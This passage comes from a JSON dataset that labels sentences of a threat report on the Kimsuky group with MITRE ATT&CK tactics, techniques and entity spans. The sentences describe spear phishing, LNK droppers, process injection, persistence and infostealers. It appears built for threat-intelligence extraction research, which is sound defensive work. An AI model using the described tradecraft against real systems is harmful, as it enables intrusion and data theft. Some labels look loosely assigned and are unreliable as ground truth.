fields", "start": 22, "end": 187, "label": "Action" }, { "text": "to steal internal information and technology from organizations", "start": 188, "end": 251, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p1-s14-8e55a7", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 14, "context_before": "[1] The group usually employs spear phishing attacks against the national defense sector, defense industries, the press, the diplomatic sector, national organizations, and academic fields to steal internal information and technology from organizations.", "sentence_text": "[2] (This link is only available in Korean.)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p1-s15-ff144c", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 15, "context_before": "[2] (This link is only available in Korean.)", "sentence_text": "Even until recently, the Kimsuky group was still mainly employing spear phishing attacks to gain initial access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Employ spear phishing attacks to gain initial access.", "entities": [ { "text": "employing spear phishing attacks to gain initial access", "start": 56, "end": 111, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p1-s16-28be86", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 16, "context_before": "Even until recently, the Kimsuky group was still mainly employing spear phishing attacks to gain initial access.", "sentence_text": "What makes the recent attacks different from the previous cases is that more LNK shortcut-type malware are being used instead of malware in Hangul Word Processor (HWP) or MS Office document format.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p1-s17-2f92f1", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 17, "context_before": "What makes the recent attacks different from the previous cases is that more LNK shortcut-type malware are being used instead of malware in Hangul Word Processor (HWP) or MS Office document format.", "sentence_text": "The threat actor led users to download a compressed file through attachments or download links within spear phishing emails.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Lead users to download a compressed file via spear phishing emails.", "entities": [ { "text": "led users to download a compressed file through attachments or download links within spear phishing emails", "start": 17, "end": 123, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p1-s18-17058f", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 18, "context_before": "The threat actor led users to download a compressed file through attachments or download links within spear phishing emails.", "sentence_text": "When this compressed file is decompressed, it yields a legitimate document file along with a malicious LNK file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Decompressing the delivered archive reveals a legitimate document alongside a malicious LNK file used for execution.", "entities": [ { "text": "compressed file", "start": 10, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "decompressed", "start": 29, "end": 41, "label": "Action" }, { "text": "malicious LNK file", "start": 93, "end": 111, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p1-s19-c6e8a2", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 19, "context_before": "When this compressed file is decompressed, it yields a legitimate document file along with a malicious LNK file.", "sentence_text": "ASEC is monitoring the Kimsuky group’s attacks using LNK-type malware and is continuously posting identified cases of attacks on the ASEC Blog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p1-s20-bb5ee1", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 20, "context_before": "ASEC is monitoring the Kimsuky group’s attacks using LNK-type malware and is continuously posting identified cases of attacks on the ASEC Blog.", "sentence_text": "The Kimsuky group installs remote control malware to control the infected system after completing such steps to 1/20", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Install remote control malware to control the infected system.", "entities": [ { "text": "installs remote control malware to control the infected system", "start": 18, "end": 80, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p2-s21-9f8700", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 21, "context_before": "The threat actor uses spear phishing emails to deliver malicious attachments.", "sentence_text": "gain initial access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Gain initial access to the target environment.", "entities": [ { "text": "gain initial access", "start": 0, "end": 19, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p2-s22-19aed9", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 22, "context_before": "gain initial access.", "sentence_text": "Malware used by the Kimsuky group not only include custom-made such as AppleSeed and PebbleDash", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p2-s23-6f7197", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 23, "context_before": "Malware used by the Kimsuky group not only include custom-made such as AppleSeed and PebbleDash", "sentence_text": "[3], but also open-source or commercial malware such as XRat", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p2-s26-e65bfa", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 26, "context_before": "[7].", "sentence_text": "After gaining control, the threat actor ultimately uses RDP or installs Google’s Chrome Remote Desktop", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Use RDP or install Chrome Remote Desktop for remote access.", "entities": [ { "text": "uses RDP or installs Google’s Chrome Remote Desktop", "start": 51, "end": 102, "label": "Action" }, { "text": "RDP", "start": 56, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "Google’s Chrome Remote Desktop", "start": 72, "end": 102, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p2-s27-ea7f44", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 27, "context_before": "After gaining control, the threat actor ultimately uses RDP or installs Google’s Chrome Remote Desktop", "sentence_text": "[8] to exfiltrate information from the infected system.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Exfiltrate information from the infected system.", "entities": [ { "text": "exfiltrate information from the infected system", "start": 7, "end": 54, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p2-s28-db8f33", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 28, "context_before": "[8] to exfiltrate information from the infected system.", "sentence_text": "Here we analyze Amadey and RftRAT which were recently found being distributed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p2-s29-bff371", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 29, "context_before": "Here we analyze Amadey and RftRAT which were recently found being distributed.", "sentence_text": "Amadey and RftRAT were constantly used throughout 2023 alongside XRat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p2-s30-0a7aab", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 30, "context_before": "Amadey and RftRAT were constantly used throughout 2023 alongside XRat.", "sentence_text": "However, recent types showed that they were created with AutoIt.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p2-s31-9b8b07", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 31, "context_before": "However, recent types showed that they were created with AutoIt.", "sentence_text": "This post also covers Infostealers additionally installed by the Kimsuky group using remote control malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p2-s32-919699", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 32, "context_before": "This post also covers Infostealers additionally installed by the Kimsuky group using remote control malware.", "sentence_text": "While remote control-type malware continuously change, the malware installed through these have not changed much in the attacks in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p2-s34-62ecc7", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 34, "context_before": "2. Initial Access 2.1.", "sentence_text": "Spear Phishing Attack", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p2-s35-0f9cf8", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 35, "context_before": "Spear Phishing Attack", "sentence_text": "In the year 2023, ASEC covered cases of LNK malware distribution in posts such as “Malicious LNK File Disguised as a Normal HWP Document”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p2-s36-4085b0", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 36, "context_before": "In the year 2023, ASEC covered cases of LNK malware distribution in posts such as “Malicious LNK File Disguised as a Normal HWP Document”", "sentence_text": "[10], and “Distribution of Malicious LNK File Disguised as Producing Corporate Promotional Materials”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p2-s38-a6f674", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 2, "sentence_id": 38, "context_before": "Producing Corporate Promotional Materials", "sentence_text": "By attaching files or including download links in the emails, the threat actor prompted users to download the compressed file and execute the LNK shortcut file inside.\n2/20", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "Attach files or include links in emails to prompt users to download and execute a malicious LNK file.", "entities": [ { "text": "attaching files or including download links in the emails", "start": 3, "end": 60, "label": "Action" }, { "text": "the threat actor", "start": 62, "end": 78, "label": "ThreatActor" }, { "text": "prompted users to download the compressed file and execute the LNK shortcut file inside", "start": 79, "end": 166, "label": "Action" }, { "text": "emails", "start": 54, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "the compressed file", "start": 106, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "LNK shortcut file", "start": 142, "end": 159, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p3-s40-014be2", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 3, "sentence_id": 40, "context_before": "2.2.", "sentence_text": "LNK Malware The LNK file contains an encrypted compressed file, which in turn holds various malware in script format.\n3/20", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p4-s41-8ad5ae", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 4, "sentence_id": 41, "context_before": "LNK Malware The LNK file contains an encrypted compressed file, which in turn holds various malware in script format.\n3/20", "sentence_text": "The BAT and VBS scripts inside can either be used for executing other scripts or contain an Infostealer responsible for collecting and exfiltrating information from the infected system.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1056", "name": "Input Capture" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Execute scripts and collect and exfiltrate information from the infected system.", "entities": [ { "text": "used for executing other scripts", "start": 45, "end": 77, "label": "Action" }, { "text": "collecting and exfiltrating information from the infected system", "start": 120, "end": 184, "label": "Action" }, { "text": "Infostealer", "start": 92, "end": 103, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p4-s42-825a93", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 4, "sentence_id": 42, "context_before": "The BAT and VBS scripts inside can either be used for executing other scripts or contain an Infostealer responsible for collecting and exfiltrating information from the infected system.", "sentence_text": "There is also a script for maintaining persistence as well as a downloader that downloads and executes additional payloads from an external source.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Maintain persistence and download and execute additional payloads from an external source.", "entities": [ { "text": "maintaining persistence", "start": 27, "end": 50, "label": "Action" }, { "text": "downloads and executes additional payloads from an external source", "start": 80, "end": 146, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p4-s43-078e33", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 4, "sentence_id": 43, "context_before": "There is also a script for maintaining persistence as well as a downloader that downloads and executes additional payloads from an external source.", "sentence_text": "After a remote control malware is installed, keyloggers and Infostealers are installed to steal internal information and technology from the organizations.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1056", "name": "Input Capture" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Install keyloggers and infostealers to steal internal information and credentials.", "entities": [ { "text": "installed to steal internal information and technology from the organizations", "start": 77, "end": 154, "label": "Action" }, { "text": "keyloggers", "start": 45, "end": 55, "label": "MalwareTool" }, { "text": "Infostealers", "start": 60, "end": 72, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p4-s44-9e1d73", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 4, "sentence_id": 44, "context_before": "After a remote control malware is installed, keyloggers and Infostealers are installed to steal internal information and technology from the organizations.", "sentence_text": "Remote Control Malware 3.1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p4-s45-68b3d4", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 4, "sentence_id": 45, "context_before": "Remote Control Malware 3.1.", "sentence_text": "XRat (QuasarRAT)\nXRat is a RAT malware developed in .NET and was created based on QuasarRAT published on GitHub.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p4-s46-e8dabc", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 4, "sentence_id": 46, "context_before": "XRat (QuasarRAT)...", "sentence_text": "It was confirmed that the Kimsuky group was using XRat from a much earlier point in time.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The Kimsuky group used XRat.", "entities": [ { "text": "Kimsuky group", "start": 26, "end": 39, "label": "ThreatActor" }, { "text": "using XRat", "start": 44, "end": 54, "label": "Action" }, { "text": "XRat", "start": 50, "end": 54, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p4-s47-feb440", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 4, "sentence_id": 47, "context_before": "It was confirmed that the Kimsuky group was using XRat from a much earlier point in time.", "sentence_text": "It consists of the file “ht.dll” which is the loader, the data file “htsetting.ini” holding the configuration data, and an encrypted payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p4-s48-705a50", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 4, "sentence_id": 48, "context_before": "It consists of the file “ht.dll” which is the loader...", "sentence_text": "This method seems to be for the purpose of bypassing security products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p5-s49-b44b8c", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 5, "sentence_id": 49, "context_before": "This method seems to be for the purpose of bypassing security products.\n4/20", "sentence_text": "The loader reads, decrypts, and injects the htsetting.ini file located in the same path.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Read, decrypt, and inject htsetting.ini file.", "entities": [ { "text": "reads, decrypts, and injects the htsetting.ini file", "start": 11, "end": 62, "label": "Action" }, { "text": "htsetting.ini", "start": 44, "end": 57, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p5-s50-c26248", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 5, "sentence_id": 50, "context_before": "The loader reads, decrypts, and injects the htsetting.ini file located in the same path.", "sentence_text": "All ht.dll loaders identified so far were packed with VMP, and the decrypted binary contained the following strings used by the threat actor.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "The decrypted binary contained strings used by the threat actor.", "entities": [ { "text": "ht.dll loaders", "start": 4, "end": 18, "label": "MalwareTool" }, { "text": "contained", "start": 84, "end": 93, "label": "Action" }, { "text": "strings used by the threat actor", "start": 108, "end": 140, "label": "Action" }, { "text": "threat actor", "start": 128, "end": 140, "label": "ThreatActor" } ] }, { "uid": "aptnotes-02_aptnotes_report-p5-s51-93d112", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 5, "sentence_id": 51, "context_before": "All ht.dll loaders identified so far were packed with VMP, and the decrypted binary contained the following strings used by the threat actor.", "sentence_text": "Ht.dll references this information to read and decrypt the encrypted file before injecting it into a legitimate process.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Read and decrypt encrypted file and inject it into a legitimate process.", "entities": [ { "text": "read and decrypt the encrypted file", "start": 38, "end": 73, "label": "Action" }, { "text": "injecting it into a legitimate process", "start": 81, "end": 119, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p5-s52-d7e14e", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 5, "sentence_id": 52, "context_before": "Ht.dll references this information to read and decrypt the encrypted file before injecting it into a legitimate process.", "sentence_text": "The payload that is injected and run in the end can be another malware besides XRat, depending on the encrypted file.\n3.2.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p5-s53-259b7a", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 5, "sentence_id": 53, "context_before": "The payload that is injected...", "sentence_text": "Amadey\nThe Kimsuky group also used Amadey Bot in their attacks.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The Kimsuky group used Amadey Bot in attacks.", "entities": [ { "text": "Kimsuky group", "start": 11, "end": 24, "label": "ThreatActor" }, { "text": "used Amadey Bot", "start": 30, "end": 45, "label": "Action" }, { "text": "Amadey Bot", "start": 35, "end": 45, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p5-s54-414b65", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 5, "sentence_id": 54, "context_before": "Amadey\nThe Kimsuky group also used Amadey Bot in their attacks.", "sentence_text": "Amadey is a malware that began being sold on illegal forums.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p5-s55-aba826", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 5, "sentence_id": 55, "context_before": "Amadey is a malware that began being sold on illegal forums.", "sentence_text": "It is a downloader that installs additional malware from the C&C server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p5-s56-a1f036", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 5, "sentence_id": 56, "context_before": "It is a downloader that installs additional malware from the C&C server.", "sentence_text": " It also transmit basic information about the system or exfiltrate screenshots and account credentials saved in web browsers and email clients depending on the settings or whether certain plugins are installed.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" }, { "id": "T1113", "name": "Screen Capture" }, { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Transmit system information and exfiltrate screenshots and saved account credentials.", "entities": [ { "text": "it", "start": 15, "end": 17, "label": "MalwareTool" }, { "text": "transmit basic information about the system", "start": 9, "end": 52, "label": "Action" }, { "text": "exfiltrate screenshots and account credentials saved in web browsers and email clients", "start": 56, "end": 142, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p5-s57-ae3942", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 5, "sentence_id": 57, "context_before": "Besides such downloader features...", "sentence_text": "The Kimsuky group uses a dropper to install Amadey.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The Kimsuky group uses a dropper to install Amadey.", "entities": [ { "text": "Kimsuky group", "start": 4, "end": 17, "label": "ThreatActor" }, { "text": "uses a dropper to install Amadey", "start": 18, "end": 50, "label": "Action" }, { "text": "Amadey", "start": 44, "end": 50, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p5-s58-b797b3", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 5, "sentence_id": 58, "context_before": "The Kimsuky group uses a dropper to install Amadey.", "sentence_text": "This is also presumed to be an attempt to evade security products by intentionally increasing the size.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p6-s60-9ea5ed", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 6, "sentence_id": 60, "context_before": "5/20", "sentence_text": "Afterward, it creates the path “%ALLUSERSPROFILE%\\Startup” and registers it to the Startup folder.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "Create Startup folder path and register it for persistence.", "entities": [ { "text": "creates the path “%ALLUSERSPROFILE%\\Startup”", "start": 14, "end": 58, "label": "Action" }, { "text": "registers it to the Startup folder", "start": 63, "end": 97, "label": "Action" }, { "text": "%ALLUSERSPROFILE%\\Startup", "start": 32, "end": 57, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p6-s61-9d79f1", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 6, "sentence_id": 61, "context_before": "Afterward, it creates the path...", "sentence_text": "Here, a script named “svc.vbs” is created, which is responsible for maintaining persistence.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": null, "procedure": "A script named svc.vbs is created to maintain persistence.", "entities": [ { "text": "script named “svc.vbs”", "start": 8, "end": 30, "label": "MalwareTool" }, { "text": "is created", "start": 31, "end": 41, "label": "Action" }, { "text": "maintaining persistence", "start": 68, "end": 91, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p6-s62-eea03c", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 6, "sentence_id": 62, "context_before": "Here, a script named “svc.vbs” is created, which is responsible for maintaining persistence.", "sentence_text": "Amadey, which is loaded and executed through the Rundll32.exe process, goes through svchost.exe before being injected into the iexplore.exe process and run.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1218.011", "name": "Rundll32" }, { "id": "T1055", "name": "Process Injection" } ], "procedure": "Load and execute Amadey via rundll32, then inject it into iexplore.exe.", "entities": [ { "text": "loaded and executed through the Rundll32.exe process", "start": 17, "end": 69, "label": "Action" }, { "text": "injected into the iexplore.exe process", "start": 109, "end": 147, "label": "Action" }, { "text": "Amadey", "start": 0, "end": 6, "label": "MalwareTool" }, { "text": "Rundll32.exe", "start": 49, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "svchost.exe", "start": 84, "end": 95, "label": "Infrastructure_Indicator" }, { "text": "iexplore.exe", "start": 127, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p6-s63-98e418", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 6, "sentence_id": 63, "context_before": "Amadey, which is loaded and executed through the Rundll32.exe process, goes through svchost.exe before being injected into the iexplore.exe process and run.", "sentence_text": "Said dropper also included RftRAT besides Amadey.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p6-s64-b27668", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 6, "sentence_id": 64, "context_before": "Said dropper also included RftRAT besides Amadey.", "sentence_text": "The RftRAT instances identified in these attacks were all packed with VMP like Amadey and were found to contain the keyword “RFTServer” in the decrypted strings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p6-s65-5cd73a", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 6, "sentence_id": 65, "context_before": "The RftRAT instances identified in these attacks were all packed with VMP like Amadey and were found to contain the keyword “RFTServer” in the decrypted strings.", "sentence_text": "RftRAT is a backdoor that can receive commands from the C&C server and execute them.\n6/20", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p7-s67-05b061", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 7, "sentence_id": 67, "context_before": "3.3.", "sentence_text": "Latest Attack Cases It was recently identified that the Kimsuky group has been using AutoIt to create malware.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Use AutoIt to create malware.", "entities": [ { "text": "has been using AutoIt to create malware", "start": 70, "end": 109, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p7-s68-6210fd", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 7, "sentence_id": 68, "context_before": "Latest Attack Cases It was recently identified that the Kimsuky group has been using AutoIt to create malware.", "sentence_text": "The Kimsuky group ported Amadey which had been used from the past to AutoIt and also used it for the purpose of injecting RftRAT.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Port Amadey to AutoIt and use it to inject RftRAT.", "entities": [ { "text": "ported Amadey which had been used from the past to AutoIt", "start": 18, "end": 75, "label": "Action" }, { "text": "used it for the purpose of injecting RftRAT", "start": 85, "end": 128, "label": "Action" }, { "text": "Amadey", "start": 25, "end": 31, "label": "MalwareTool" }, { "text": "RftRAT", "start": 122, "end": 128, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p7-s69-e8a629", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 7, "sentence_id": 69, "context_before": "The Kimsuky group ported Amadey which had been used from the past to AutoIt and also used it for the purpose of injecting RftRAT.", "sentence_text": "The string within the PDB path shows that the threat actor named this malware “rft” as a RAT type.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p7-s70-d3979f", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 7, "sentence_id": 70, "context_before": "The string within the PDB path shows that the threat actor named this malware “rft” as a RAT type.", "sentence_text": "Accordingly, said malware is categorized as “RftRAT” here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p7-s71-c97fdf", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 7, "sentence_id": 71, "context_before": "Accordingly, said malware is categorized as “RftRAT” here.", "sentence_text": "PDB String:\nE:_WORK\\My_Work\\Exploit\\Spyware_spy\\RAT\\RFT_Socket_V3.2\\Release\\rft.pdb\n3.3.1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p7-s72-b6203f", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 7, "sentence_id": 72, "context_before": "PDB String:\nE:_WORK\\My_Work\\Exploit\\Spyware_spy\\RAT\\RFT_Socket_V3.2\\Release\\rft.pdb\n3.3.1.", "sentence_text": "AUTOIT AMADEY As covered above, Amadey is one of the malware that has been constantly used by the Kimsuky group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p7-s73-76314f", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 7, "sentence_id": 73, "context_before": "AUTOIT AMADEY As covered above, Amadey is one of the malware that has been constantly used by the Kimsuky group.", "sentence_text": "The version of Amadey used by the Kimsuky group is different from the type used by other threat actors: Kimsuky group’s Amadey uses Domain Generation Algorithms 7/20", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1568", "name": "Dynamic Resolution" } ], "procedure": "Use Domain Generation Algorithms for C2 communication.", "entities": [ { "text": "uses Domain Generation Algorithms", "start": 127, "end": 160, "label": "Action" }, { "text": "Amadey", "start": 15, "end": 21, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p8-s74-3616d0", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 8, "sentence_id": 74, 